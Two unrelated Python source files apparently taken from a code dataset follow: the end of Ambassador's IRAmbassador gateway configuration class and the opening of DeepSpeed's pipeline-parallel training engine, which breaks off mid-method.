'liveness_probe',
'load_balancer',
'readiness_probe',
'resolver',
'server_name',
'service_port',
'statsd',
'use_proxy_proto',
'use_remote_address',
'x_forwarded_proto_redirect',
'xff_num_trusted_hops',
'enable_http10'
]
service_port: int
diag_port: int
# Set up the default probes and such.
default_liveness_probe: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/check_alive",
"rewrite": "/ambassador/v0/check_alive",
}
default_readiness_probe: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/check_ready",
"rewrite": "/ambassador/v0/check_ready",
}
default_diagnostics: ClassVar[Dict[str, str]] = {
"prefix": "/ambassador/v0/",
"rewrite": "/ambassador/v0/",
}
def __init__(self, ir: 'IR', aconf: Config,
rkey: str="ir.ambassador",
kind: str="IRAmbassador",
name: str="ir.ambassador",
use_remote_address: bool=True,
**kwargs) -> None:
# print("IRAmbassador __init__ (%s %s %s)" % (kind, name, kwargs))
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
service_port=Constants.SERVICE_PORT_HTTP,
admin_port=Constants.ADMIN_PORT,
diag_port=Constants.DIAG_PORT,
auth_enabled=None,
enable_ipv6=False,
enable_ipv4=True,
liveness_probe={"enabled": True},
readiness_probe={"enabled": True},
diagnostics={"enabled": True},
use_proxy_proto=False,
enable_http10=False,
use_remote_address=use_remote_address,
x_forwarded_proto_redirect=False,
load_balancer=None,
circuit_breakers=None,
xff_num_trusted_hops=0,
server_name="envoy",
**kwargs
)
def setup(self, ir: 'IR', aconf: Config) -> bool:
# We're interested in the 'ambassador' module from the Config, if any...
amod = aconf.get_module("ambassador")
# Is there a TLS module in the Ambassador module?
if amod:
self.sourced_by(amod)
self.referenced_by(amod)
amod_tls = amod.get('tls', None)
if amod_tls:
# XXX What a hack. IRAmbassadorTLS.from_resource() should be able to make
# this painless.
new_args = dict(amod_tls)
new_rkey = new_args.pop('rkey', amod.rkey)
new_kind = new_args.pop('kind', 'Module')
new_name = new_args.pop('name', 'tls-from-ambassador-module')
new_location = new_args.pop('location', amod.location)
# Overwrite any existing TLS module.
ir.tls_module = IRAmbassadorTLS(ir, aconf,
rkey=new_rkey,
kind=new_kind,
name=new_name,
location=new_location,
**new_args)
# ir.logger.debug("IRAmbassador saving TLS module: %s" % ir.tls_module.as_json())
if ir.tls_module:
self.logger.debug("final TLS module: %s" % ir.tls_module.as_json())
# Stash a sane rkey and location for contexts we create.
ctx_rkey = ir.tls_module.get('rkey', self.rkey)
ctx_location = ir.tls_module.get('location', self.location)
# The TLS module 'server' and 'client' blocks are actually a _single_ TLSContext
# to Ambassador.
server = ir.tls_module.pop('server', None)
client = ir.tls_module.pop('client', None)
if server and server.get('enabled', True):
# We have a server half. Excellent.
ctx = IRTLSContext.from_legacy(ir, 'server', ctx_rkey, ctx_location,
cert=server, termination=True, validation_ca=client)
if ctx.is_active():
ir.save_tls_context(ctx)
# Other blocks in the TLS module weren't ever really documented, so I seriously doubt
# that they're a factor... but, weirdly, we have a test for them...
for legacy_name, legacy_ctx in ir.tls_module.as_dict().items():
if (legacy_name.startswith('_') or
(legacy_name == 'name') or
(legacy_name == 'location') or
(legacy_name == 'kind') or
(legacy_name == 'enabled')):
continue
ctx = IRTLSContext.from_legacy(ir, legacy_name, ctx_rkey, ctx_location,
cert=legacy_ctx, termination=False, validation_ca=None)
if ctx.is_active():
ir.save_tls_context(ctx)
# Finally, check TLSContext resources to see if we should enable TLS termination.
for ctx in ir.get_tls_contexts():
if ctx.get('hosts', None):
# This is a termination context
self.logger.debug("TLSContext %s is a termination context, enabling TLS termination" % ctx.name)
self.service_port = Constants.SERVICE_PORT_HTTPS
if ctx.get('ca_cert', None):
# Client-side TLS is enabled.
self.logger.debug("TLSContext %s enables client certs!" % ctx.name)
# After that, check for port definitions, probes, etc., and copy them in
# as we find them.
for key in IRAmbassador.AModTransparentKeys:
if amod and (key in amod):
# Yes. It overrides the default.
self[key] = amod[key]
# If we don't have a default label domain, force it to 'ambassador'.
if not self.get('default_label_domain'):
self.default_label_domain = 'ambassador'
# Likewise, if we have no default labels, force an empty dict (it makes life easier
# on other modules).
if not self.get('default_labels'):
self.default_labels: Dict[str, Any] = {}
# Next up: diag port & services.
diag_port = aconf.module_lookup('ambassador', 'diag_port', Constants.DIAG_PORT)
diag_service = "127.0.0.1:%d" % diag_port
for name, cur, dflt in [
("liveness", self.liveness_probe, IRAmbassador.default_liveness_probe),
("readiness", self.readiness_probe, IRAmbassador.default_readiness_probe),
("diagnostics", self.diagnostics, IRAmbassador.default_diagnostics)
]:
if cur and cur.get("enabled", False):
if not cur.get('prefix', None):
cur['prefix'] = dflt['prefix']
if not cur.get('rewrite', None):
cur['rewrite'] = dflt['rewrite']
if not cur.get('service', None):
cur['service'] = diag_service
if amod and ('enable_grpc_http11_bridge' in amod):
self.grpc_http11_bridge = IRFilter(ir=ir, aconf=aconf,
kind='ir.grpc_http1_bridge',
name='grpc_http1_bridge',
config=dict())
self.grpc_http11_bridge.sourced_by(amod)
ir.save_filter(self.grpc_http11_bridge)
if amod and ('enable_grpc_web' in amod):
self.grpc_web = IRFilter(ir=ir, aconf=aconf, kind='ir.grpc_web', name='grpc_web', config=dict())
self.grpc_web.sourced_by(amod)
ir.save_filter(self.grpc_web)
if amod and ('lua_scripts' in amod):
self.lua_scripts = IRFilter(ir=ir, aconf=aconf, kind='ir.lua_scripts', name='lua_scripts',
config={'inline_code': amod.lua_scripts})
self.lua_scripts.sourced_by(amod)
ir.save_filter(self.lua_scripts)
# Gzip.
if amod and ('gzip' in amod):
self.gzip = IRGzip(ir=ir, aconf=aconf, location=self.location, **amod.gzip)
if self.gzip:
ir.save_filter(self.gzip)
else:
return False
# Buffer.
if amod and ('buffer' in amod):
self.buffer = IRBuffer(ir=ir, aconf=aconf, location=self.location, **amod.buffer)
if self.buffer:
ir.save_filter(self.buffer)
else:
return False
# Finally, default CORS stuff.
if amod and ('cors' in amod):
self.cors = IRCORS(ir=ir, aconf=aconf, location=self.location, **amod.cors)
if self.cors:
self.cors.referenced_by(self)
else:
return False
if amod and ('retry_policy' in amod):
self.retry_policy = IRRetryPolicy(ir=ir, aconf=aconf, location=self.location, **amod.retry_policy)
if self.retry_policy:
self.retry_policy.referenced_by(self)
else:
return False
if self.get('load_balancer', None) is not None:
if not IRHTTPMapping.validate_load_balancer(self['load_balancer']):
self.post_error("Invalid load_balancer specified: {}".format(self['load_balancer']))
return False
if self.get('circuit_breakers', None) is not None:
if not IRHTTPMapping.validate_circuit_breakers(self['circuit_breakers']):
self.post_error("Invalid circuit_breakers specified: {}".format(self['circuit_breakers']))
return False
return True
def add_mappings(self, ir: 'IR', aconf: Config):
for name, cur in [
( "liveness", self.liveness_probe ),
( "readiness", self.readiness_probe ),
( "diagnostics", self.diagnostics )
]:
if cur and cur.get("enabled", False):
name = "internal_%s_probe_mapping" % name
mapping = IRHTTPMapping(ir, aconf, rkey=self.rkey, name=name, location=self.location,
timeout_ms=10000, **cur)
mapping.referenced_by(self)
ir.add_mapping(aconf, mapping)
def get_default_label_domain(self) -> str:
return self.default_label_domain
def get_default_labels(self, domain: Optional[str]=None) -> Optional[List]:
if not domain:
domain = self.get_default_label_domain()
domain_info = self.default_labels.get(domain, {})
self.logger.debug("default_labels info for %s: %s" % (domain, domain_info))
return domain_info.get('defaults')
def get_default_label_prefix(self, domain: Optional[str]=None) -> Optional[List]:
if not domain:
domain = self.get_default_label_domain()
domain_info = self.default_labels.get(domain, {})
return domain_info.get('label_prefix')
|
the-stack_0_6505 | # Copyright 2019 The Microsoft DeepSpeed Team
import time
import logging
import copy
import os
from types import MethodType
from numpy import prod
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
from deepspeed.utils.logging import logger
from deepspeed.utils.timer import SynchronizedWallClockTimer, ThroughputTimer
from ..engine import DeepSpeedEngine, MEMORY_OPT_ALLREDUCE_SIZE
from ..utils import PartitionedTensor, ensure_directory_exists
from ..dataloader import RepeatingLoader
from .module import PipelineModule, PipelineError, TiedLayerSpec
from . import p2p
from . import schedule
TARGET_ID = -2
LOG_STAGE = -2
DATA_PARALLEL_ID = -2
def is_even(number):
return number % 2 == 0
mem_alloced = 0
mem_cached = 0
def _tensor_bytes(tensor):
return tensor.numel() * tensor.element_size()
class PipelineEngine(DeepSpeedEngine):
""" A training engine hybrid pipeline, data, and model parallel training.
This engine is created by ``deepspeed.initialize()`` when a :class:`PipelineModule`
is provided.
"""
def __init__(self, *super_args, **super_kwargs):
super().__init__(*super_args, **super_kwargs)
assert isinstance(self.module, PipelineModule), "model must base PipelineModule"
assert self.zero_optimization_stage() < 2, "ZeRO-2 and ZeRO-3 are incompatible with pipeline parallelism"
# We schedule the all-reduces, so disable it in super().backward()
self.enable_backward_allreduce = False
assert not self.elasticity_enabled(), "Elasticity is not currently supported" \
" with pipeline parallelism."
# pipeline step for logging
self.log_batch_step_id = -1
self.micro_batch_size = self.train_micro_batch_size_per_gpu()
self.micro_batches = self.gradient_accumulation_steps()
# Set Grid and Communication Groups
self.grid = self.module._grid
if self.grid.get_global_rank() == 0:
logger.info(f'CONFIG: micro_batches={self.micro_batches} '
f'micro_batch_size={self.micro_batch_size}')
self.global_rank = self.grid.get_global_rank()
assert self.dp_world_size == self.grid.data_parallel_size
assert self.train_batch_size() == \
self.micro_batch_size * self.micro_batches * self.grid.data_parallel_size
# Set Stage Inf
self.num_stages = self.grid.pipe_parallel_size
self.stage_id = self.grid.get_stage_id()
self.prev_stage = self.stage_id - 1
self.next_stage = self.stage_id + 1
self.data_iterator = None
self.batch_fn = None
self._force_grad_boundary = False
self.batch_timer = ThroughputTimer(batch_size=self.micro_batch_size *
self.micro_batches,
num_workers=self.dp_world_size,
logging_fn=self.tput_log,
monitor_memory=False,
steps_per_output=self.steps_per_print())
# PipelineEngine needs to handle data loading specially due to only the first
# and last stages loading inputs/labels. We construct a sampler that uses
if self.training_data:
self._build_data_iter(self.training_data)
self.is_pipe_parallel = self.grid.pipe_parallel_size > 1
self.is_data_parallel = self.grid.data_parallel_size > 1
self.is_model_parallel = self.grid.model_parallel_size > 1
# Partition input/output buffers
self.is_pipe_partitioned = self.is_model_parallel
self.is_grad_partitioned = False
model_parameters = filter(lambda p: p.requires_grad, self.module.parameters())
num_params = sum([p.numel() for p in model_parameters])
unique_params = num_params
# Subtract tied parameters if we don't own them
if self.module.tied_comms:
tied_params = 0
for key, d in self.module.tied_comms.items():
if self.global_rank != min(d['ranks']):
tied_params += sum(p.numel() for p in d['module'].parameters())
unique_params -= tied_params
params_tensor = torch.LongTensor(data=[num_params,
unique_params]).to(self.device)
dist.all_reduce(params_tensor, group=self.grid.get_model_parallel_group())
params_tensor = params_tensor.tolist()
total_params = params_tensor[0]
unique_params = params_tensor[1]
if self.grid.data_parallel_id == 0:
logger.info(f'RANK={self.global_rank} '
f'STAGE={self.stage_id} '
f'LAYERS={self.module._local_stop - self.module._local_start} '
f'[{self.module._local_start}, {self.module._local_stop}) '
f'STAGE_PARAMS={num_params} ({num_params/1e6:0.3f}M) '
f'TOTAL_PARAMS={total_params} ({total_params/1e6:0.3f}M) '
f'UNIQUE_PARAMS={unique_params} ({unique_params/1e6:0.3f}M)')
#intialize peer-2-peer communication and allreduce groups
if self.is_pipe_parallel:
p2p.init_process_groups(self.grid)
# Pipeline buffers
self.num_pipe_buffers = 0
self.pipe_buffers = {
'inputs' : [], # batch input and received activations
'labels' : [], # labels from batch input
'outputs' : [], # activations
'output_tensors' : [], # tensor object to preserve backward graph
}
self.pipe_recv_buf = None
self.grad_layer = None
self.meta_buffer = None
self.first_output_send = True
self.first_gradient_send = True
#stores the loss for the current micro batch being processed
self.loss = torch.tensor(0.0).to(self.device)
#stores the loss for the entire batch
self.total_loss = None
self.agg_loss = torch.tensor(0.0, requires_grad=False).to(self.device)
self.dp_group_loss = torch.tensor(0.0, requires_grad=False).to(self.device)
if self._config.pipeline['activation_checkpoint_interval'] > 0:
self.module.activation_checkpoint_interval = self._config.pipeline[
'activation_checkpoint_interval']
if self.is_last_stage():
self.loss_model = self.module.loss_fn
# Initialize pipeline communicators. Just send a 0.
if is_even(self.stage_id):
if not self.is_last_stage():
p2p.send(self.loss, self.next_stage)
if not self.is_first_stage():
p2p.recv(self.loss, self.prev_stage)
else:
if not self.is_first_stage():
p2p.recv(self.loss, self.prev_stage)
if not self.is_last_stage():
p2p.send(self.loss, self.next_stage)
# XXX look into timer reporting timing
# Initialize some timers because of early weirdness.
if self.wall_clock_breakdown():
self.timers('forward_microstep').start()
self.timers('forward_microstep').stop()
self.timers('backward_microstep').start()
self.timers('backward_microstep').stop()
self.timers('backward_inner_microstep').start()
self.timers('backward_inner_microstep').stop()
self.timers('backward_allreduce_microstep').start()
self.timers('backward_allreduce_microstep').stop()
self.timers('backward_allreduce').start()
self.timers('backward_allreduce').stop()
self.timers('step_microstep').start()
self.timers('step_microstep').stop()
def _build_data_iter(self, dataset):
sampler = torch.utils.data.distributed.DistributedSampler(
dataset,
num_replicas=self.dp_world_size,
rank=self.mpu.get_data_parallel_rank(),
shuffle=False)
# Build a loader and make it repeating.
pipe_dataloader = self.deepspeed_io(dataset, data_sampler=sampler)
pipe_dataloader = RepeatingLoader(pipe_dataloader)
self.set_dataloader(pipe_dataloader)
def _exec_reduce_tied_grads(self):
# We need to run this first to write to self.averaged_gradients;
# since this class turns `enable_backward_allreduce` off,
# `self.overlapping_partition_gradients_reduce_epilogue()` defined in the DeepSpeedEngine
# never actually runs. I suspect this is because of efficiency problems; get_flat_partition in
# stage2.py might do something expensive; someone will have to look into that later. But
# in the meantime, this fixes ZeRO2 + Pipelining enough to run a demo. Further profiling
# needed to decide if it actually breaks everything.
# (see https://github.com/EleutherAI/gpt-neox/issues/62#issuecomment-761471944)
if self.zero_optimization_partition_gradients():
self.optimizer.overlapping_partition_gradients_reduce_epilogue()
self.module.allreduce_tied_weight_gradients()
def _exec_reduce_grads(self):
self._force_grad_boundary = True
if self.is_data_parallel:
self.buffered_allreduce_fallback(
elements_per_buffer=MEMORY_OPT_ALLREDUCE_SIZE)
self._force_grad_boundary = False
def _reserve_pipe_buffers(self, num_buffers):
"""Ensure that each pipeline buffer has at least ``num_buffers`` slots.
This method only reserves slots and does not allocate tensors.
Args:
num_buffers (int): The number of buffers to reserve.
"""
if self.num_pipe_buffers >= num_buffers:
return
num_added = num_buffers - self.num_pipe_buffers
for key in self.pipe_buffers:
self.pipe_buffers[key].extend([None] * num_added)
self.num_pipe_buffers = num_buffers
def train_batch(self, data_iter=None):
"""Progress the pipeline to train the next batch of data. The engine will ingest
``self.train_batch_size()`` total samples collectively across all workers.
An iterator that over training data should be provided as an argument
unless ``deepspeed.initialize()`` was provided a training set. In that event,
the training data will automatically be read.
.. warning::
A total of ``self.gradient_accumulation_steps()`` entries will be pulled
from ``data_iter`` by each pipeline. There must be sufficient
data left in ``data_iter`` or else a ``StopIteration`` will halt training.
DeepSpeed provides a convenience class :class:`deepspeed.utils.RepeatingLoader`
that wraps data loaders to automatically restart upon a ``StopIteration``.
Args:
data_iter (Iterator, optional): Iterator of training data.
Returns:
The arithmetic mean of the losses computed this batch.
"""
if not torch._C.is_grad_enabled():
raise RuntimeError(
f'train_batch() requires gradients enabled. Use eval_batch() instead.')
if data_iter:
self.set_dataiterator(data_iter)
self.module.train()
self.total_loss = None
# Do the work
self.timers('train_batch').start()
sched = schedule.TrainSchedule(micro_batches=self.micro_batches,
stages=self.num_stages,
stage_id=self.stage_id)
self._exec_schedule(sched)
self.agg_train_loss = self._aggregate_total_loss()
self.timers('train_batch').stop()
if self.global_steps % self.steps_per_print() == 0:
if self.global_rank == 0:
elapsed = self.timers('train_batch').elapsed(reset=True)
iter_time = elapsed / self.steps_per_print()
tput = self.train_batch_size() / iter_time
print(f'steps: {self.global_steps} '
f'loss: {self.agg_train_loss:0.4f} '
f'iter time (s): {iter_time:0.3f} '
f'samples/sec: {tput:0.3f}')
# Tensorboard
if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/train_loss',
self.agg_train_loss.mean().item(),
self.global_samples)]
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
if self.global_steps % self.steps_per_print() == 0:
self.summary_writer.flush()
if self.wall_clock_breakdown(
) and self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'pipe_send_output',
'pipe_send_grad',
'pipe_recv_input',
'pipe_recv_grad'
])
# TODO: should return precisely what loss returned and allow others to be queried?
return self.agg_train_loss
def eval_batch(self, data_iter):
"""Evaluate the pipeline on a batch of data from ``data_iter``. The
engine will evaluate ``self.train_batch_size()`` total samples
collectively across all workers.
This method is equivalent to:
.. code-block:: python
module.eval()
with torch.no_grad():
output = module(batch)
.. warning::
A total of ``self.gradient_accumulation_steps()`` entries will be pulled
from ``data_iter`` by each pipeline. There must be sufficient
data left in ``data_iter`` or else a ``StopIteration`` will halt training.
DeepSpeed provides a convenience class :class:`deepspeed.utils.RepeatingLoader`
that wraps data loaders to automatically restart upon a ``StopIteration``.
Args:
data_iter (Iterator): Iterator of data to evaluate.
Returns:
The arithmetic mean of the losses computed this batch.
"""
self.module.eval()
self.total_loss = None
# Use the provided data iterator
train_iterator = self.data_iterator
self.set_dataiterator(data_iter)
# Do the work
sched = schedule.InferenceSchedule(micro_batches=self.micro_batches,
stages=self.num_stages,
stage_id=self.stage_id)
with torch.no_grad():
self._exec_schedule(sched)
self.agg_eval_loss = self._aggregate_total_loss()
if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/eval_loss',
self.agg_eval_loss.mean().item(),
self.global_samples)]
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
self.summary_writer.flush()
# Restore the training iterator
self.set_dataiterator(train_iterator)
# Reset any buffers that may have been populated during the forward passes.
#ds_checkpointing.reset()
return self.agg_eval_loss
def is_first_stage(self):
"""True if this process is in the first stage in the pipeline."""
return self.stage_id == 0
def is_last_stage(self):
"""True if this process is in the last stage in the pipeline."""
return self.stage_id == self.num_stages - 1
def _aggregate_total_loss(self):
# Scale loss, average among DP ranks, and bcast loss to the rest of my DP group
if self.is_last_stage():
loss = self._scale_loss(self.total_loss)
self.dp_group_loss = loss.clone().detach()
## Average loss across all data-parallel groups
agg_loss = self.dp_group_loss.clone().detach()
#print(f'RANK={self.global_rank} bcast SENDER src={self.global_rank} group={self.grid.pp_group}', flush=True)
if self.is_data_parallel:
dist.all_reduce(agg_loss, group=self.mpu.get_data_parallel_group())
agg_loss /= self.dp_world_size
assert self.global_rank in self.grid.pp_group
losses = torch.Tensor([self.dp_group_loss, agg_loss]).to(self.device)
dist.broadcast(tensor=losses,
src=self.global_rank,
group=self.mpu.get_pipe_parallel_group())
else:
# Get loss from last stage
src_rank = self.grid.stage_to_global(self.num_stages - 1)
assert src_rank in self.grid.pp_group
losses = torch.Tensor([0., 0.]).to(self.device)
dist.broadcast(tensor=losses,
src=src_rank,
group=self.grid.get_pipe_parallel_group())
self.dp_group_loss = losses[0].clone().detach()
agg_loss = losses[1].clone().detach()
return agg_loss
def set_dataloader(self, loader):
""""""
if self.is_first_stage() or self.is_last_stage():
self.training_dataloader = loader
self.data_iterator = iter(self.training_dataloader)
def set_dataiterator(self, iterator):
""" Store an iterator to sample for training data. """
if self.is_first_stage() or self.is_last_stage():
self.training_dataloader = None
self.data_iterator = iterator
def set_batch_fn(self, fn):
self.batch_fn = fn
def is_gradient_accumulation_boundary(self):
"""True if the engine is executing a gradient reduction or optimizer step instruction.
This is overridden from :class:`DeepSpeedEngine` to force reductions
and steps when the pipeline engine is instructed to do so.
Returns:
bool: whether reductions and optimizer steps should occur.
"""
return self._force_grad_boundary
def log_for_device(self, *msg):
if LOG_STAGE == self.stage_id or LOG_STAGE == -1:
if DATA_PARALLEL_ID == self.grid.data_parallel_id or DATA_PARALLEL_ID == -1:
print(
f'RANK={dist.get_rank()} '
f'PIPE-ID={self.stage_id} '
f'DATA-ID={self.grid.data_parallel_id} '
f'MBATCH-ID={self.microbatch_id} '
f'STEP-ID={self.log_batch_step_id} '
'::',
*msg,
flush=True)
def tput_log(self, *msg):
if self.global_rank == 0 and self.global_steps % self.steps_per_print() == 0:
print(*msg)
def _next_batch(self):
if self.is_model_parallel:
mp_rank = self.grid.get_slice_parallel_rank()
else:
mp_rank = 0
batch = None
# Only MP rank 0 loads the data.
if mp_rank == 0:
if self.data_iterator is None:
raise ValueError(f"RANK={self.global_rank} no data iterator provided.")
batch = next(self.data_iterator)
# All MP ranks participate in batch_fn, where they might broadcast the data.
if self.batch_fn:
batch = self.batch_fn(batch)
return batch
def _exec_forward_pass(self, buffer_id):
self.tput_timer.start()
self.mem_status('BEFORE FWD', reset_max=True)
if isinstance(self.pipe_buffers['inputs'][buffer_id], tuple):
inputs = tuple(t.clone() for t in self.pipe_buffers['inputs'][buffer_id])
else:
inputs = self.pipe_buffers['inputs'][buffer_id].clone()
# collect the partitioned input from the previous stage
if self.is_pipe_partitioned and not self.is_first_stage():
part_input = PartitionedTensor.from_meta(
meta=inputs[0],
local_part=inputs[1],
group=self.grid.get_slice_parallel_group())
inputs = tuple([part_input.full(), inputs[2]])
inputs[0].requires_grad = True
# skip mask
#inputs[1].requires_grad = True
part_input = None
self.pipe_buffers['inputs'][buffer_id] = inputs
# Zero out the gradients each time we use the tensor because only the data in
# tensor changes across batches
self._zero_grads(inputs)
outputs = super().forward(inputs)
# Partition the outputs if we are not the last stage
if self.is_pipe_partitioned and not self.is_last_stage():
part = PartitionedTensor(tensor=outputs[0],
group=self.grid.get_slice_parallel_group())
# Clear the large output data, but save the computation graph
outputs[0].data = torch.zeros(1)
self.pipe_buffers['output_tensors'][buffer_id] = outputs[0]
# Inject the partitioned tensor into the output before sending
outputs = tuple([part.to_meta(), part.data(), outputs[1]])
part = None
self.pipe_buffers['outputs'][buffer_id] = outputs
# Optionally compute loss on the last device
if self.is_last_stage():
if self.loss_model is not None:
labels = self.pipe_buffers['labels'][buffer_id]
self.loss = self.loss_model(outputs, labels)
else:
# Some models just return loss from forward()
self.loss = outputs
if isinstance(self.loss, torch.Tensor):
if self.total_loss is None:
self.total_loss = torch.zeros_like(self.loss)
self.total_loss += self.loss.detach()
else:
if self.total_loss is None:
self.total_loss = [torch.zeros_like(l) for l in self.loss]
for idx, l in enumerate(self.loss):
self.total_loss[idx] += l.detach()
def _exec_backward_pass(self, buffer_id):
assert self.optimizer is not None, "must provide optimizer during " \
"init in order to use backward"
self.mem_status('BEFORE BWD', reset_max=True)
# The last stage just runs backward on the loss using DeepSpeed's typical
# mechanisms.
if self.is_last_stage():
super().backward(self.loss)
self.mem_status('AFTER BWD')
return
outputs = self.pipe_buffers['outputs'][buffer_id]
if self.wall_clock_breakdown():
self.timers('backward_microstep').start()
self.timers('backward').start()
self.timers('backward_inner_microstep').start()
self.timers('backward_inner').start()
# Reconstruct if we previously partitioned the output. We must be
# careful to also restore the computational graph of the tensors we partitioned.
if self.is_pipe_partitioned:
if self.is_grad_partitioned:
part_output = PartitionedTensor.from_meta(
meta=outputs[0],
local_part=outputs[1],
group=self.grid.get_slice_parallel_group())
self.pipe_buffers['output_tensors'][buffer_id].data = part_output.full()
outputs = tuple(
[self.pipe_buffers['output_tensors'][buffer_id],
outputs[2]])
else:
# Already restored from partition
self.pipe_buffers['output_tensors'][buffer_id].data = outputs[0]
outputs = tuple(
[self.pipe_buffers['output_tensors'][buffer_id],
outputs[1]])
grad_tensors = self.grad_layer
if self.is_grad_partitioned:
#print(f'RANK={self.global_rank} BEFORE-BWD restoring grad={self.grad_layer[0].size()} {self.grad_layer[1].size()}')
part_grad = PartitionedTensor.from_meta(
meta=self.grad_layer[0],
local_part=self.grad_layer[1],
group=self.grid.get_slice_parallel_group())
grad_tensors = tuple([part_grad.full(), self.grad_layer[2]])
part_grad = None
#print(f'RANK={self.global_rank} BEFORE-BWD restored grad={self.grad_layer[0].size()} {self.grad_layer[1].size()}')
# This handles either a single tensor or tuple of tensors.
if isinstance(outputs, tuple):
out_tensors = [t for t in outputs if t.is_floating_point()]
assert len(out_tensors) == len(grad_tensors)
torch.autograd.backward(tensors=out_tensors, grad_tensors=grad_tensors)
else:
torch.autograd.backward(tensors=(outputs, ), grad_tensors=(grad_tensors, ))
# Free up the memory from the output of forward()
self.pipe_buffers['output_tensors'][buffer_id] = None
self.pipe_buffers['outputs'][buffer_id] = None
grad_tensors = None
if self.wall_clock_breakdown():
self.timers('backward_inner').stop()
self.timers('backward_inner_microstep').stop()
self.timers('backward').stop()
self.timers('backward_microstep').stop()
self.mem_status('AFTER BWD')
def _exec_load_micro_batch(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('batch_input').start()
batch = self._next_batch()
if self.is_first_stage():
loaded = None
if torch.is_tensor(batch[0]):
loaded = batch[0].clone().to(self.device).detach()
loaded.requires_grad = loaded.is_floating_point()
else:
assert isinstance(batch[0], tuple)
# Assume list or tuple
loaded = []
for x in batch[0]:
assert torch.is_tensor(x)
mine = x.clone().detach().to(self.device)
mine.requires_grad = mine.is_floating_point()
loaded.append(mine)
loaded = tuple(loaded)
self.pipe_buffers['inputs'][buffer_id] = loaded
if self.is_last_stage():
loaded = batch[1]
if torch.is_tensor(batch[1]):
loaded = batch[1].to(self.device)
elif isinstance(batch[1], tuple):
loaded = []
for x in batch[1]:
assert torch.is_tensor(x)
x = x.to(self.device).detach()
loaded.append(x)
loaded = tuple(loaded)
self.pipe_buffers['labels'][buffer_id] = loaded
if self.wall_clock_breakdown():
self.timers('batch_input').stop()
def _send_tensor_meta(self, buffer, recv_stage):
""" Communicate metadata about upcoming p2p transfers.
Metadata is communicated in this order:
* type (0: tensor, 1: list)
* num_tensors if type=list
foreach tensor in buffer:
* ndims
* shape
"""
send_bytes = 0
if isinstance(buffer, torch.Tensor):
type_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.send(type_tensor, recv_stage)
send_shape = torch.LongTensor(data=buffer.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(buffer.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
send_bytes += _tensor_bytes(buffer)
elif isinstance(buffer, list):
assert (False)
type_tensor = torch.LongTensor(data=[1]).to(self.device)
p2p.send(type_tensor, recv_stage)
count_tensor = torch.LongTensor(data=[len(buffer)]).to(self.device)
p2p.send(count_tensor, recv_stage)
for tensor in buffer:
assert isinstance(tensor, torch.Tensor)
send_shape = torch.LongTensor(data=tensor.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(tensor.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
send_bytes += _tensor_bytes(tensor)
elif isinstance(buffer, tuple):
type_tensor = torch.LongTensor(data=[2]).to(self.device)
p2p.send(type_tensor, recv_stage)
count_tensor = torch.LongTensor(data=[len(buffer)]).to(self.device)
p2p.send(count_tensor, recv_stage)
for idx, tensor in enumerate(buffer):
assert isinstance(tensor, torch.Tensor)
send_shape = torch.LongTensor(data=tensor.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(tensor.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
# Useful for performance debugging.
'''
new_bytes = _tensor_bytes(tensor)
send_bytes += _tensor_bytes(tensor)
# Useful for performance debugging.
if self.grid.data_parallel_id == 0:
print(
f'STAGE={self.stage_id} pipe-send-volume[{idx}]: shape={send_shape} {new_bytes/1024**2:0.2f}MB'
)
'''
else:
raise NotImplementedError(f'Could not send meta type {type(buffer)}')
# Useful for performance debugging.
'''
if self.grid.data_parallel_id == 0:
print(f'STAGE={self.stage_id} pipe-send-volume: {send_bytes/1024**2:0.2f}MB')
'''
def _recv_tensor_meta(self, send_stage):
"""Receive metadata about upcoming p2p transfers and return allocated buffers.
Metadata is communicated in this order:
* type (0: tensor, 1: list)
* num_tensors if type=list
foreach tensor in buffer:
* ndims
* shape
Returns:
Allocated buffer for receiving from send_stage.
"""
type_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(type_tensor, send_stage)
recv_type = type_tensor.item()
# A single tensor will be sent.
if recv_type == 0:
recv_ndims = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(recv_ndims, send_stage)
recv_ndims = recv_ndims.item()
recv_shape = torch.LongTensor([1] * recv_ndims).to(self.device)
p2p.recv(recv_shape, send_stage)
recv_shape = recv_shape.tolist()
return self._allocate_buffer(recv_shape, num_buffers=1)[0]
# List or tuple of tensors
elif recv_type == 1 or recv_type == 2:
count_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(count_tensor, send_stage)
num_tensors = count_tensor.item()
recv_shapes = []
for idx in range(num_tensors):
recv_ndims = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(recv_ndims, send_stage)
recv_ndims = recv_ndims.item()
recv_shape = torch.LongTensor([1] * recv_ndims).to(self.device)
p2p.recv(recv_shape, send_stage)
recv_shapes.append(recv_shape.tolist())
buffers = self._allocate_buffers(recv_shapes, num_buffers=1)[0]
# Convert to tuples if requested.
if recv_type == 2:
buffers = tuple(buffers)
return buffers
else:
raise NotImplementedError(f'Could not receive type {type(recv_type)}')
def _exec_send_activations(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_send_output').start()
outputs = self.pipe_buffers['outputs'][buffer_id]
# NCCL does not like to send torch.BoolTensor types, so cast the mask to half().
# We could do char, but with half() we can eventually flatten with other fp16
# messages (TODO)
if self.module.__class__.__name__ == 'GPT2ModelPipe':
outputs = list(outputs)
outputs[-1] = outputs[-1].half()
outputs = tuple(outputs)
if self.first_output_send:
self.first_output_send = False
